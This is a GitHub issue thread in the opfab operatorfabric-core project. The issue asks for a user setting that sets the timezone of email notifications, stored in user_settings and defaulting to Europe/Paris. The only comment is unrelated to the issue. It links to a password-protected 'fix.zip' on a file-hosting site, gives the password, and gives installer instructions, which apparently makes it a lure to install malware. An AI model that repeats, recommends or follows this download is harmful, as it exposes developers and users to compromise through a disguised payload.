### ISSUE TITLE
Add a timezone selection for email notifications in user settings

### ISSUE THREAD

**Issue by vlo-rte** [opfab/operatorfabric-core#7083]
related to : https://github.com/opfab/operatorfabric-core/issues/7061

Currently, cards-external-diffusion do not know the timezone of the user (for start and end dates for example).
So after discussion, we decided to add a new field in settings screen allowing the user to choose the timezone he wants for the mails he will receive.  This field will be stored in database, in the collection "user_settings".

- [x] This field must be displayed/hidden depending on a conf value.
- [x] The default value (in cards-external diffusion) must be Europe/Paris.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
